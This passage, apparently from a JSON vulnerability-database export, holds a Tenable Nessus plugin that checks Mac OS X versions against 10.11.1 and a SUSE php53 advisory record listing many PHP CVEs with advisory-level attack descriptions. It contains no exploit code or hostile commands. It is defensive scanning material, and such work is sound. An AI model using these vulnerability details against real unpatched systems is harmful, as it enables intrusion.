value:\n\"The remote host is running a version of Mac OS X that is 10.9.5 or\nlater but prior to 10.11.1 It is, therefore, affected by multiple\nvulnerabilities in the following components :\n\n - Accelerate Framework (CVE-2015-5940)\n\n - apache_mod_php (CVE-2015-0235, CVE-2015-0273,\n CVE-2015-6834, CVE-2015-6835, CVE-2015-6836,\n CVE-2015-6837, CVE-2015-6838)\n\n - ATS (CVE-2015-6985)\n\n - Audio (CVE-2015-5933, CVE-2015-5934, CVE-2015-7003)\n\n - Bom (CVE-2015-7006)\n\n - CFNetwork (CVE-2015-7023)\n\n - configd (CVE-2015-7015)\n\n - CoreGraphics (CVE-2015-5925, CVE-2015-5926)\n\n - CoreText (CVE-2015-5944, CVE-2015-6975, CVE-2015-6992,\n CVE-2015-7017)\n\n - Directory Utility (CVE-2015-6980)\n\n - Disk Images (CVE-2015-6995)\n\n - EFI (CVE-2015-7035)\n\n - File Bookmark (CVE-2015-6987)\n\n - FontParser (CVE-2015-5927, CVE-2015-5942, CVE-2015-6976,\n CVE-2015-6977, CVE-2015-6978, CVE-2015-6990,\n CVE-2015-6991, CVE-2015-6993, CVE-2015-7008,\n CVE-2015-7009, CVE-2015-7010, CVE-2015-7018)\n\n - Grand Central Dispatch (CVE-2015-6989)\n\n - Graphics Drivers (CVE-2015-7019, CVE-2015-7020,\n CVE-2015-7021)\n\n - ImageIO (CVE-2015-5935, CVE-2015-5936, CVE-2015-5937,\n CVE-2015-5938, CVE-2015-5939)\n\n - IOAcceleratorFamily (CVE-2015-6996)\n\n - IOHIDFamily (CVE-2015-6974)\n\n - Kernel (CVE-2015-5932, CVE-2015-6988, CVE-2015-6994)\n\n - libarchive (CVE-2015-6984)\n\n - MCX Application Restrictions (CVE-2015-7016)\n\n - Net-SNMP (CVE-2014-3565, CVE-2012-6151)\n\n - OpenGL (CVE-2015-5924)\n\n - OpenSSH (CVE-2015-6563)\n\n - Sandbox (CVE-2015-5945)\n\n - Script Editor (CVE-2015-7007)\n\n - Security (CVE-2015-6983, CVE-2015-7024)\n\n - SecurityAgent (CVE-2015-5943)\n\nNote that successful exploitation of the most serious issues can\nresult in arbitrary code execution.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.apple.com/en-us/HT205375\");\n # https://lists.apple.com/archives/security-announce/2015/Oct/msg00005.html\n 
script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?c7e01da3\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Mac OS X 10.11.1 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Safari User-Assisted Applescript Exec Attack');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2012/09/05\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/10/21\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/10/29\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"combined\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:apple:mac_os_x\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"MacOS X Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2015-2018 Tenable Network Security, Inc.\");\n\n script_dependencies(\"ssh_get_info.nasl\", \"os_fingerprint.nasl\");\n script_require_ports(\"Host/MacOSX/Version\", \"Host/OS\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\n\nos = get_kb_item(\"Host/MacOSX/Version\");\nif (!os)\n{\n os = get_kb_item_or_exit(\"Host/OS\");\n if (\"Mac OS X\" >!< os) audit(AUDIT_OS_NOT, \"Mac OS X\");\n\n c = get_kb_item(\"Host/OS/Confidence\");\n if (c <= 70) exit(1, \"Cannot determine the host's OS with sufficient 
confidence.\");\n}\nif (!os) audit(AUDIT_OS_NOT, \"Mac OS X\");\n\nmatch = eregmatch(pattern:\"Mac OS X ([0-9]+(\\.[0-9]+)+)\", string:os);\nif (isnull(match)) exit(1, \"Failed to parse the Mac OS X version ('\" + os + \"').\");\n\nversion = match[1];\n\nif (\n version !~ \"^10\\.11([^0-9]|$)\"\n) audit(AUDIT_OS_NOT, \"Mac OS X 10.11 or later\", \"Mac OS X \"+version);\n\nfixed_version = \"10.11.1\";\nif (ver_compare(ver:version, fix:fixed_version, strict:FALSE) == -1)\n{\n if (report_verbosity > 0)\n {\n report = '\\n Installed version : ' + version +\n '\\n Fixed version : ' + fixed_version +\n '\\n';\n security_hole(port:0, extra:report);\n }\n else security_hole(0);\n exit(0);\n}\nelse exit(0, \"The host is not affected since it is running Mac OS X \"+version+\".\");\n", "cvss": {"score": 10, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-10-09T01:30:05", "description": "This update for php53 to version 5.3.17 fixes the following issues :\n\nThese security issues were fixed :\n\n - CVE-2016-5093: get_icu_value_internal out-of-bounds read (bnc#982010).\n\n - CVE-2016-5094: Don't create strings with lengths outside int range (bnc#982011).\n\n - CVE-2016-5095: Don't create strings with lengths outside int range (bnc#982012).\n\n - CVE-2016-5096: int/size_t confusion in fread (bsc#982013).\n\n - CVE-2016-5114: fpm_log.c memory leak and buffer overflow (bnc#982162).\n\n - CVE-2015-8879: The odbc_bindcols function in ext/odbc/php_odbc.c in PHP mishandles driver behavior for SQL_WVARCHAR columns, which allowed remote attackers to cause a denial of service (application crash) in opportunistic circumstances by leveraging use of the odbc_fetch_array function to access a certain type of Microsoft SQL Server table (bsc#981050).\n\n - CVE-2015-4116: Use-after-free vulnerability in the spl_ptr_heap_insert function in ext/spl/spl_heap.c in PHP allowed remote attackers to execute arbitrary code by triggering a failed SplMinHeap::compare operation 
(bsc#980366).\n\n - CVE-2015-8874: Stack consumption vulnerability in GD in PHP allowed remote attackers to cause a denial of service via a crafted imagefilltoborder call (bsc#980375).\n\n - CVE-2015-8873: Stack consumption vulnerability in Zend/zend_exceptions.c in PHP allowed remote attackers to cause a denial of service (segmentation fault) via recursive method calls (bsc#980373).\n\n - CVE-2016-4540: The grapheme_stripos function in ext/intl/grapheme/grapheme_string.c in PHP allowed remote attackers to cause a denial of service (out-of-bounds read) or possibly have unspecified other impact via a negative offset (bsc#978829).\n\n - CVE-2016-4541: The grapheme_strpos function in ext/intl/grapheme/grapheme_string.c in PHP allowed remote attackers to cause a denial of service (out-of-bounds read) or possibly have unspecified other impact via a negative offset (bsc#978829).\n\n - CVE-2016-4542: The exif_process_IFD_TAG function in ext/exif/exif.c in PHP did not properly construct spprintf arguments, which allowed remote attackers to cause a denial of service (out-of-bounds read) or possibly have unspecified other impact via crafted header data (bsc#978830).\n\n - CVE-2016-4543: The exif_process_IFD_in_JPEG function in ext/exif/exif.c in PHP did not validate IFD sizes, which allowed remote attackers to cause a denial of service (out-of-bounds read) or possibly have unspecified other impact via crafted header data (bsc#978830).\n\n - CVE-2016-4544: The exif_process_TIFF_in_JPEG function in ext/exif/exif.c in PHP did not validate TIFF start data, which allowed remote attackers to cause a denial of service (out-of-bounds read) or possibly have unspecified other impact via crafted header data (bsc#978830).\n\n - CVE-2016-4537: The bcpowmod function in ext/bcmath/bcmath.c in PHP accepted a negative integer for the scale argument, which allowed remote attackers to cause a denial of service or possibly have unspecified other impact via a crafted call (bsc#978827).\n\n - 
CVE-2016-4538: The bcpowmod function in ext/bcmath/bcmath.c in PHP modified certain data structures without considering whether they are copies of the _zero_, _one_, or _two_ global variable, which allowed remote attackers to cause a denial of service or possibly have unspecified other impact via a crafted call (bsc#978827).\n\n - CVE-2016-4539: The xml_parse_into_struct function in ext/xml/xml.c in PHP allowed remote attackers to cause a denial of service (buffer under-read and segmentation fault) or possibly have unspecified other impact via crafted XML data in the second argument, leading to a parser level of zero (bsc#978828).\n\n - CVE-2016-4342: ext/phar/phar_object.c in PHP mishandles zero-length uncompressed data, which allowed remote attackers to cause a denial of service (heap memory corruption) or possibly have unspecified other impact via a crafted (1) TAR, (2) ZIP, or (3) PHAR archive (bsc#977991).\n\n - CVE-2016-4346: Integer overflow in the str_pad function in ext/standard/string.c in PHP allowed remote attackers to cause a denial of service or possibly have unspecified other impact via a long string, leading to a heap-based buffer overflow (bsc#977994).\n\n - CVE-2016-4073: Multiple integer overflows in the mbfl_strcut function in ext/mbstring/libmbfl/mbfl/mbfilter.c in PHP allowed remote attackers to cause a denial of service (application crash) or possibly execute arbitrary code via a crafted mb_strcut call (bsc#977003).\n\n - CVE-2015-8867: The openssl_random_pseudo_bytes function in ext/openssl/openssl.c in PHP incorrectly relied on the deprecated RAND_pseudo_bytes function, which made it easier for remote attackers to defeat cryptographic protection mechanisms via unspecified vectors (bsc#977005).\n\n - CVE-2016-4070: Integer overflow in the php_raw_url_encode function in ext/standard/url.c in PHP allowed remote attackers to cause a denial of service (application crash) via a long string to the rawurlencode function (bsc#976997).\n\n - 
CVE-2015-8866: ext/libxml/libxml.c in PHP when PHP-FPM is used, did not isolate each thread from libxml_disable_entity_loader changes in other threads, which allowed remote attackers to conduct XML External Entity (XXE) and XML Entity Expansion (XEE) attacks via a crafted XML document, a related issue to CVE-2015-5161 (bsc#976996).\n\n - CVE-2015-8838: ext/mysqlnd/mysqlnd.c in PHP used a client SSL option to mean that SSL is optional, which allowed man-in-the-middle attackers to spoof servers via a cleartext-downgrade attack, a related issue to CVE-2015-3152 (bsc#973792).\n\n - CVE-2015-8835: The make_http_soap_request function in ext/soap/php_http.c in PHP did not properly retrieve keys, which allowed remote attackers to cause a denial of service (NULL pointer dereference, type confusion, and application crash) or possibly execute arbitrary code via crafted serialized data representing a numerically indexed _cookies array, related to the SoapClient::__call method in ext/soap/soap.c (bsc#973351).\n\n - CVE-2016-3141: Use-after-free vulnerability in wddx.c in the WDDX extension in PHP allowed remote attackers to cause a denial of service (memory corruption and application crash) or possibly have unspecified other impact by triggering a wddx_deserialize call on XML data containing a crafted var element (bsc#969821).\n\n - CVE-2016-3142: The phar_parse_zipfile function in zip.c in the PHAR extension in PHP allowed remote attackers to obtain sensitive information from process memory or cause a denial of service (out-of-bounds read and application crash) by placing a PK\\x05\\x06 signature at an invalid location (bsc#971912).\n\n - CVE-2014-9767: Directory traversal vulnerability in the ZipArchive::extractTo function in ext/zip/php_zip.c in PHP ext/zip/ext_zip.cpp in HHVM allowed remote attackers to create arbitrary empty directories via a crafted ZIP archive (bsc#971612).\n\n - CVE-2016-3185: The make_http_soap_request function in ext/soap/php_http.c in PHP allowed 
remote attackers to obtain sensitive information from process memory or cause a denial of service (type confusion and application crash) via crafted serialized _cookies data, related to the SoapClient::__call method in ext/soap/soap.c (bsc#971611).\n\n - CVE-2016-2554: Stack-based buffer overflow in ext/phar/tar.c in PHP allowed remote attackers to cause a denial of service (application crash) or possibly have unspecified other impact via a crafted TAR archive (bsc#968284).\n\n - CVE-2015-7803: The phar_get_entry_data function in ext/phar/util.c in PHP allowed remote attackers to cause a denial of service (NULL pointer dereference and application crash) via a .phar file with a crafted TAR archive entry in which the Link indicator references a file that did not exist (bsc#949961).\n\n - CVE-2015-6831: Multiple use-after-free vulnerabilities in SPL in PHP allowed remote attackers to execute arbitrary code via vectors involving (1) ArrayObject, (2) SplObjectStorage, and (3) SplDoublyLinkedList, which are mishandled during unserialization (bsc#942291).\n\n - CVE-2015-6833: Directory traversal vulnerability in the PharData class in PHP allowed remote attackers to write to arbitrary files via a .. 
(dot dot) in a ZIP archive entry that is mishandled during an extractTo call (bsc#942296).\n\n - CVE-2015-6836: The SoapClient __call method in ext/soap/soap.c in PHP did not properly manage headers, which allowed remote attackers to execute arbitrary code via crafted serialized data that triggers a 'type confusion' in the serialize_function_call function (bsc#945428).\n\n - CVE-2015-6837: The xsl_ext_function_php function in ext/xsl/xsltprocessor.c in PHP when libxml2 is used, did not consider the possibility of a NULL valuePop return value before proceeding with a free operation during initial error checking, which allowed remote attackers to cause a denial of service (NULL pointer dereference and application crash) via a crafted XML document, a different vulnerability than CVE-2015-6838 (bsc#945412).\n\n - CVE-2015-6838: The xsl_ext_function_php function in ext/xsl/xsltprocessor.c in PHP when libxml2 is used, did not consider the possibility of a NULL valuePop return value before proceeding with a free operation after the principal argument loop, which allowed remote attackers to cause a denial of service (NULL pointer dereference and application crash) via a crafted XML document, a different vulnerability than CVE-2015-6837 (bsc#945412).\n\n - CVE-2015-5590: Stack-based buffer overflow in the phar_fix_filepath function in ext/phar/phar.c in PHP allowed remote attackers to cause a denial of service or possibly have unspecified other impact via a large length value, as demonstrated by mishandling of an e-mail attachment by the imap PHP extension (bsc#938719).\n\n - CVE-2015-5589: The phar_convert_to_other function in ext/phar/phar_object.c in PHP did not validate a file pointer before a close operation, which allowed remote attackers to cause a denial of service (segmentation fault) or possibly have unspecified other impact via a crafted TAR archive that is mishandled in a Phar::convertToData call (bsc#938721).\n\n - CVE-2015-4602: The __PHP_Incomplete_Class function in 
ext/standard/incomplete_class.c in PHP allowed remote attackers to cause a denial of service (application crash) or possibly execute arbitrary code via an unexpected data type, related to a 'type confusion' issue (bsc#935224).\n\n - CVE-2015-4599: The SoapFault::__toString method in ext/soap/soap.c in PHP allowed remote attackers to obtain sensitive information, cause a denial of service (application crash), or possibly execute arbitrary code via an unexpected data type, related to a 'type confusion' issue (bsc#935226).\n\n - CVE-2015-4600: The SoapClient implementation in PHP allowed remote attackers to cause a denial of service (application crash) or possibly execute arbitrary code via an unexpected data type, related to 'type confusion' issues in the (1) SoapClient::__getLastRequest, (2) SoapClient::__getLastResponse, (3) SoapClient::__getLastRequestHeaders, (4) SoapClient::__getLastResponseHeaders, (5) SoapClient::__getCookies, and (6) SoapClient::__setCookie methods (bsc#935226).\n\n - CVE-2015-4601: PHP allowed remote attackers to cause a denial of service (application crash) or possibly execute arbitrary code via an unexpected data type, related to 'type confusion' issues in (1) ext/soap/php_encoding.c, (2) ext/soap/php_http.c, and (3) ext/soap/soap.c, a different issue than CVE-2015-4600 (bsc#935226).\n\n - CVE-2015-4603: The exception::getTraceAsString function in Zend/zend_exceptions.c in PHP allowed remote attackers to execute arbitrary code via an unexpected data type, related to a 'type confusion' issue (bsc#935234).\n\n - CVE-2015-4644: The php_pgsql_meta_data function in pgsql.c in the PostgreSQL (aka pgsql) extension in PHP did not validate token extraction for table names, which might have allowed remote attackers to cause a denial of service (NULL pointer dereference and application crash) via a crafted name. 
NOTE: this vulnerability exists because of an incomplete fix for CVE-2015-1352 (bsc#935274).\n\n - CVE-2015-4643: Integer overflow in the ftp_genlist function in ext/ftp/ftp.c in PHP allowed remote FTP servers to execute arbitrary code via a long reply to a LIST command, leading to a heap-based buffer overflow.\n NOTE: this vulnerability exists because of an incomplete fix for CVE-2015-4022 (bsc#935275).\n\n - CVE-2015-3411: PHP did not ensure that pathnames lack %00 sequences, which might have allowed remote attackers to read or write to arbitrary files via crafted input to an application that calls (1) a DOMDocument load method, (2) the xmlwriter_open_uri function, (3) the finfo_file function, or (4) the hash_hmac_file function, as demonstrated by a filename\\0.xml attack that bypasses an intended configuration in which client users may read only .xml files (bsc#935227).\n\n - CVE-2015-3412: PHP did not ensure that pathnames lack %00 sequences, which might have allowed remote attackers to read arbitrary files via crafted input to an application that calls the stream_resolve_include_path function in ext/standard/streamsfuncs.c, as demonstrated by a filename\\0.extension attack that bypasses an intended configuration in which client users may read files with only one specific extension (bsc#935229).\n\n - CVE-2015-4598: PHP did not ensure that pathnames lack %00 sequences, which might have allowed remote attackers to read or write to arbitrary files via crafted input to an application that calls (1) a DOMDocument save method or (2) the GD imagepsloadfont function, as demonstrated by a filename\\0.html attack that bypasses an intended configuration in which client users may write to only .html files (bsc#935232).\n\n - CVE-2015-4148: The do_soap_call function in ext/soap/soap.c in PHP did not verify that the uri property is a string, which allowed remote attackers to obtain sensitive information by providing crafted serialized data with an int data type, related to 
a 'type confusion' issue (bsc#933227).\n\n - CVE-2015-4024: Algorithmic complexity vulnerability in the multipart_buffer_headers function in main/rfc1867.c in PHP allowed remote attackers to cause a denial of service (CPU consumption) via crafted form data that triggers an improper order-of-growth outcome (bsc#931421).\n\n - CVE-2015-4026: The pcntl_exec implementation in PHP truncates a pathname upon encountering a \\x00 character, which might have allowed remote attackers to bypass intended extension restrictions and execute files with unexpected names via a crafted first argument. NOTE: this vulnerability exists because of an incomplete fix for CVE-2006-7243 (bsc#931776).\n\n - CVE-2015-4022: Integer overflow in the ftp_genlist function in ext/ftp/ftp.c in PHP allowed remote FTP servers to execute arbitrary code via a long reply to a LIST command, leading to a heap-based buffer overflow (bsc#931772).\n\n - CVE-2015-4021: The phar_parse_tarfile function in ext/phar/tar.c in PHP did not verify that the first character of a filename is different from the \\0 character, which allowed remote attackers to cause a denial of service (integer underflow and memory corruption) via a crafted entry in a tar archive (bsc#931769).\n\n - CVE-2015-3329: Multiple stack-based buffer overflows in the phar_set_inode function in phar_internal.h in PHP allowed remote attackers to execute arbitrary code via a crafted length value in a (1) tar, (2) phar, or (3) ZIP archive (bsc#928506).\n\n - CVE-2015-2783: ext/phar/phar.c in PHP allowed remote attackers to obtain sensitive information from process memory or cause a denial of service (buffer over-read and application crash) via a crafted length value in conjunction with crafted serialized data in a phar archive, related to the phar_parse_metadata and phar_parse_pharfile functions (bsc#928511).\n\n - CVE-2015-2787: Use-after-free vulnerability in the process_nested_data function in ext/standard/var_unserializer.re in PHP allowed remote 
attackers to execute arbitrary code via a crafted unserialize call that leverages use of the unset function within an __wakeup function, a related issue to CVE-2015-0231 (bsc#924972).\n\n - CVE-2014-9709: The GetCode_ function in gd_gif_in.c in GD 2.1.1 and earlier, as used in PHP allowed remote attackers to cause a denial of service (buffer over-read and application crash) via a crafted GIF image that is improperly handled by the gdImageCreateFromGif function (bsc#923945).\n\n - CVE-2015-2301: Use-after-free vulnerability in the phar_rename_archive function in phar_object.c in PHP allowed remote attackers to cause a denial of service or possibly have unspecified other impact via vectors that trigger an attempted renaming of a Phar archive to the name of an existing file (bsc#922452).\n\n - CVE-2015-2305: Integer overflow in the regcomp implementation in the Henry Spencer BSD regex library (aka rxspencer) on 32-bit platforms might have allowed context-dependent attackers to execute arbitrary code via a large regular expression that leads to a heap-based buffer overflow (bsc#921950).\n\n - CVE-2014-9705: Heap-based buffer overflow in the enchant_broker_request_dict function in ext/enchant/enchant.c in PHP allowed remote attackers to execute arbitrary code via vectors that trigger creation of multiple dictionaries (bsc#922451).\n\n - CVE-2015-0273: Multiple use-after-free vulnerabilities in ext/date/php_date.c in PHP allowed remote attackers to execute arbitrary code via crafted serialized input containing a (1) R or (2) r type specifier in (a) DateTimeZone data handled by the php_date_timezone_initialize_from_hash function or (b) DateTime data handled by the php_date_initialize_from_hash function (bsc#918768).\n\n - CVE-2014-9652: The mconvert function in softmagic.c in file as used in the Fileinfo component in PHP did not properly handle a certain string-length field during a copy of a truncated version of a Pascal string, which might have allowed remote attackers to cause 
a denial of service (out-of-bounds memory access and application crash) via a crafted file (bsc#917150).\n\n - CVE-2014-8142: Use-after-free vulnerability in the process_nested_data function in ext/standard/var_unserializer.re in PHP allowed remote attackers to execute arbitrary code via a crafted unserialize call that leverages improper handling of duplicate keys within the serialized properties of an object, a different vulnerability than CVE-2004-1019 (bsc#910659).\n\n - CVE-2015-0231: Use-after-free vulnerability in the process_nested_data function in ext/standard/var_unserializer.re in PHP allowed remote attackers to execute arbitrary code via a crafted unserialize call that leverages improper handling of duplicate numerical keys within the serialized properties of an object. NOTE: this vulnerability exists because of an incomplete fix for CVE-2014-8142 (bsc#910659).\n\n - CVE-2014-8142: Use-after-free vulnerability in the process_nested_data function in ext/standard/var_unserializer.re in PHP allowed remote attackers to execute arbitrary code via a crafted unserialize call that leverages improper handling of duplicate keys within the serialized properties of an object, a different vulnerability than CVE-2004-1019 (bsc#910659).\n\n - CVE-2015-0232: The exif_process_unicode function in ext/exif/exif.c in PHP allowed remote attackers to execute arbitrary code or cause a denial of service (uninitialized pointer free and application crash) via crafted EXIF data in a JPEG image (bsc#914690).\n\n - CVE-2014-3670: The exif_ifd_make_value function in exif.c in the EXIF extension in PHP operates on floating-point arrays incorrectly, which allowed remote attackers to cause a denial of service (heap memory corruption and application crash) or possibly execute arbitrary code via a crafted JPEG image with TIFF thumbnail data that is improperly handled by the exif_thumbnail function (bsc#902357).\n\n - CVE-2014-3669: Integer overflow in the object_custom function in 
ext/standard/var_unserializer.c in PHP allowed remote attackers to cause a denial of service (application crash) or possibly execute arbitrary code via an argument to the unserialize function that triggers calculation of a large length value (bsc#902360).\n\n - CVE-2014-3668: Buffer overflow in the date_from_ISO8601 function in the mkgmtime implementation in libxmlrpc/xmlrpc.c in the XMLRPC extension in PHP allowed remote attackers to cause a denial of service (application crash) via (1) a crafted first argument to the xmlrpc_set_type function or (2) a crafted argument to the xmlrpc_decode function, related to an out-of-bounds read operation (bsc#902368).\n\n - CVE-2014-5459: The PEAR_REST class in REST.php in PEAR in PHP allowed local users to write to arbitrary files via a symlink attack on a (1) rest.cachefile or (2) rest.cacheid file in /tmp/pear/cache/, related to the retrieveCacheFirst and useLocalCache functions (bsc#893849).\n\n - CVE-2014-3597: Multiple buffer overflows in the php_parserr function in ext/standard/dns.c in PHP allowed remote DNS servers to cause a denial of service (application crash) or possibly execute arbitrary code via a crafted DNS record, related to the dns_get_record function and the dn_expand function. 
NOTE: this issue exists because of an incomplete fix for CVE-2014-4049 (bsc#893853).\n\n - CVE-2014-4670: Use-after-free vulnerability in ext/spl/spl_dllist.c in the SPL component in PHP allowed context-dependent attackers to cause a denial of service or possibly have unspecified other impact via crafted iterator usage within applications in certain web-hosting environments (bsc#886059).\n\n - CVE-2014-4698: Use-after-free vulnerability in ext/spl/spl_array.c in the SPL component in PHP allowed context-dependent attackers to cause a denial of service or possibly have unspecified other impact via crafted ArrayIterator usage within applications in certain web-hosting environments (bsc#886060).\n\n - CVE-2014-4721: The phpinfo implementation in ext/standard/info.c in PHP did not ensure use of the string data type for the PHP_AUTH_PW, PHP_AUTH_TYPE, PHP_AUTH_USER, and PHP_SELF variables, which might have allowed context-dependent attackers to obtain sensitive information from process memory by using the integer data type with crafted values, related to a 'type confusion' vulnerability, as demonstrated by reading a private SSL key in an Apache HTTP Server web-hosting environment with mod_ssl and a PHP 5.3.x mod_php (bsc#885961).\n\n - CVE-2014-0207: The cdf_read_short_sector function in cdf.c in file as used in the Fileinfo component in PHP allowed remote attackers to cause a denial of service (assertion failure and application exit) via a crafted CDF file (bsc#884986).\n\n - CVE-2014-3478: Buffer overflow in the mconvert function in softmagic.c in file as used in the Fileinfo component in PHP allowed remote attackers to cause a denial of service (application crash) via a crafted Pascal string in a FILE_PSTRING conversion (bsc#884987).\n\n - CVE-2014-3479: The cdf_check_stream_offset function in cdf.c in file as used in the Fileinfo component in PHP relies on incorrect sector-size data, which allowed remote attackers to cause a denial of service (application crash) via a 
crafted stream offset in a CDF file (bsc#884989).\n\n - CVE-2014-3480: The cdf_count_chain function in cdf.c in file as used in the Fileinfo component in PHP did not properly validate sector-count data, which allowed remote attackers to cause a denial of service (application crash) via a crafted CDF file (bsc#884990).\n\n - CVE-2014-3487: The cdf_read_property_info function in file as used in the Fileinfo component in PHP did not properly validate a stream offset, which allowed remote attackers to cause a denial of service (application crash) via a crafted CDF file (bsc#884991).\n\n - CVE-2014-3515: The SPL component in PHP incorrectly anticipates that certain data structures will have the array data type after unserialization, which allowed remote attackers to execute arbitrary code via a crafted string that triggers use of a Hashtable destructor, related to 'type confusion' issues in (1) ArrayObject and (2) SPLObjectStorage (bsc#884992).\n\nThe update package also includes non-security fixes. See advisory for details.\n\nNote that Tenable Network Security has extracted the preceding description block directly from the SUSE security advisory. 
Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {"score": 9.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2016-08-29T00:00:00", "type": "nessus", "title": "SUSE SLES11 Security Update : php53 (SUSE-SU-2016:1638-1) (BACKRONYM)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2004-1019", "CVE-2006-7243", "CVE-2014-0207", "CVE-2014-3478", "CVE-2014-3479", "CVE-2014-3480", "CVE-2014-3487", "CVE-2014-3515", "CVE-2014-3597", "CVE-2014-3668", "CVE-2014-3669", "CVE-2014-3670", "CVE-2014-4049", "CVE-2014-4670", "CVE-2014-4698", "CVE-2014-4721", "CVE-2014-5459", "CVE-2014-8142", "CVE-2014-9652", "CVE-2014-9705", "CVE-2014-9709", "CVE-2014-9767", "CVE-2015-0231", "CVE-2015-0232", "CVE-2015-0273", "CVE-2015-1352", "CVE-2015-2301", "CVE-2015-2305", "CVE-2015-2783", "CVE-2015-2787", "CVE-2015-3152", "CVE-2015-3329", "CVE-2015-3411", "CVE-2015-3412", "CVE-2015-4021", "CVE-2015-4022", "CVE-2015-4024", "CVE-2015-4026", "CVE-2015-4116", "CVE-2015-4148", "CVE-2015-4598", "CVE-2015-4599", "CVE-2015-4600", "CVE-2015-4601", "CVE-2015-4602", "CVE-2015-4603", "CVE-2015-4643", "CVE-2015-4644", "CVE-2015-5161", "CVE-2015-5589", "CVE-2015-5590", "CVE-2015-6831", "CVE-2015-6833", "CVE-2015-6836", "CVE-2015-6837", "CVE-2015-6838", "CVE-2015-7803", "CVE-2015-8835", "CVE-2015-8838", "CVE-2015-8866", "CVE-2015-8867", "CVE-2015-8873", "CVE-2015-8874", "CVE-2015-8879", "CVE-2016-2554", "CVE-2016-3141", "CVE-2016-3142", "CVE-2016-3185", "CVE-2016-4070", "CVE-2016-4073", "CVE-2016-4342", "CVE-2016-4346", "CVE-2016-4537", "CVE-2016-4538", "CVE-2016-4539", "CVE-2016-4540", "CVE-2016-4541", "CVE-2016-4542", "CVE-2016-4543", "CVE-2016-4544", "CVE-2016-5093", "CVE-2016-5094", "CVE-2016-5095", "CVE-2016-5096", "CVE-2016-5114"], "modified": "2021-01-19T00:00:00", "cpe": ["p-cpe:/a:novell:suse_linux:apache2-mod_php53", "p-cpe:/a:novell:suse_linux:php53", 
"p-cpe:/a:novell:suse_linux:php53-bcmath", "p-cpe:/a:novell:suse_linux:php53-bz2", "p-cpe:/a:novell:suse_linux:php53-calendar", "p-cpe:/a:novell:suse_linux:php53-ctype", "p-cpe:/a:novell:suse_linux:php53-curl", "p-cpe:/a:novell:suse_linux:php53-dba", "p-cpe:/a:novell:suse_linux:php53-dom", "p-cpe:/a:novell:suse_linux:php53-exif", "p-cpe:/a:novell:suse_linux:php53-fastcgi", "p-cpe:/a:novell:suse_linux:php53-fileinfo", "p-cpe:/a:novell:suse_linux:php53-ftp", "p-cpe:/a:novell:suse_linux:php53-gd", "p-cpe:/a:novell:suse_linux:php53-gettext", "p-cpe:/a:novell:suse_linux:php53-gmp", "p-cpe:/a:novell:suse_linux:php53-iconv", "p-cpe:/a:novell:suse_linux:php53-intl", "p-cpe:/a:novell:suse_linux:php53-json", "p-cpe:/a:novell:suse_linux:php53-ldap", "p-cpe:/a:novell:suse_linux:php53-mbstring", "p-cpe:/a:novell:suse_linux:php53-mcrypt", "p-cpe:/a:novell:suse_linux:php53-mysql", "p-cpe:/a:novell:suse_linux:php53-odbc", "p-cpe:/a:novell:suse_linux:php53-openssl", "p-cpe:/a:novell:suse_linux:php53-pcntl", "p-cpe:/a:novell:suse_linux:php53-pdo", "p-cpe:/a:novell:suse_linux:php53-pear", "p-cpe:/a:novell:suse_linux:php53-pgsql", "p-cpe:/a:novell:suse_linux:php53-pspell", "p-cpe:/a:novell:suse_linux:php53-shmop", "p-cpe:/a:novell:suse_linux:php53-snmp", "p-cpe:/a:novell:suse_linux:php53-soap", "p-cpe:/a:novell:suse_linux:php53-suhosin", "p-cpe:/a:novell:suse_linux:php53-sysvmsg", "p-cpe:/a:novell:suse_linux:php53-sysvsem", "p-cpe:/a:novell:suse_linux:php53-sysvshm", "p-cpe:/a:novell:suse_linux:php53-tokenizer", "p-cpe:/a:novell:suse_linux:php53-wddx", "p-cpe:/a:novell:suse_linux:php53-xmlreader", "p-cpe:/a:novell:suse_linux:php53-xmlrpc", "p-cpe:/a:novell:suse_linux:php53-xmlwriter", "p-cpe:/a:novell:suse_linux:php53-xsl", "p-cpe:/a:novell:suse_linux:php53-zip", "p-cpe:/a:novell:suse_linux:php53-zlib", "cpe:/o:novell:suse_linux:11"], "id": "SUSE_SU-2016-1638-1.NASL", "href": "https://www.tenable.com/plugins/nessus/93161", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable 
